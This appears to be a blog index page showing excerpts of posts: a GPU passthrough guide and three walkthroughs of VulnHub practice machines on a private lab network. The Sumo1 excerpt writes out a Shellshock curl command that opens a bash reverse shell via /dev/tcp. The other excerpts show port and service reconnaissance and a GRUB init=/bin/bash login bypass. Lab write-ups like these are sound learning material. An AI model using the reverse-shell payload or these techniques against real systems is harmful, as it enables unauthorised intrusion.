A Guide to GPU Passthrough with QEMU/KVM

Main Repo URL Gitlab About this Guide My current setup is the same as was in my Single GPU Passthrough Guide, just with an addition RTX 3070. Two dedicated graphic cards, however, this should also work on intergrated graphic + dedicated graphic card(s), as commonly found on Intel platforms. Laptops could work, possibly, but with many caveats that I am not familiar with. This guide is best served as a compliment to the Arch Wiki: PCI passthrough via OVMF, please take a look at that first if you can, and I will be constantly referencing and linking to the articles in there....

Sep 25, 2022 12:00 · ledisthebest

How to hack into Sumo1 from VulHub

https://www.vulnhub.com/entry/sumo-1,480/ System Info Ubuntu 12.04 LTS Discover Target Network sudo nmap -sn 192.168.122.0-255 nmap -p- 192.168.122.113 Port 80 not much to see on the website, other than it is running apache 2.2.22 ShellShock https://www.sevenlayers.com/index.php/125-exploiting-shellshock use nikto -host 192.168.122.113 to scan for webserver vulnerabilities. it shows that/cgi-bin/test, /cgi-bin/test.sh, /cgi-bin/test/test.cgi is vulnerable to Shellshock vulnerability running: curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi to open a revese shell on port 7741 to host using TCP...

Nov 16, 2022 14:00 · liucreator

How to hack into Sunset Dawn from VulHub

https://www.vulnhub.com/entry/sunset-dawn,341/ System Info Debian 10 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.11 nmap -p 80,139,445,3306 -sC -sV 192.168.122.11 enum4linux -a 192.168.122.11 Port 80 robots.txt does not exist using dirb http://192.168.122.11 we can find http://192.168.122.11/logs/ we can download management.log from it and take a look SMB server Port 139 and port 445 indicate that there is a smb server on the target machine use smbclient -L //dawn to list all the service of it, and we can find shared disk ITDEPT we can log into it by smbclient //dawn/ITDEPT now we are in the smb share, but it is empty if we go back to reading that management....

Nov 8, 2022 16:00 · liucreator

How to hack into BBS Cute from VulHub

https://www.vulnhub.com/entry/bbs-cute-102,567/ Fix VM network Debian 10, network is broken in QEMU launch VM, edit GRUB parameters of line linux ..., change ro to rw, and add init=/bin/bash after it to by pass login edit /etc/network/interfaces, change interface name to ours, add auto enp1s0 Discover Target IP sudo nmap -sn 192.168.122.1-255 Scan Ports `nmap -p- 192.168.122.122 nmap -p 22,80,88,110,995 -sC -sV 192.168.122.122 Port 80 This site doesn’t have a robots.txt run dirb http://192....

Nov 7, 2022 15:00 · liucreator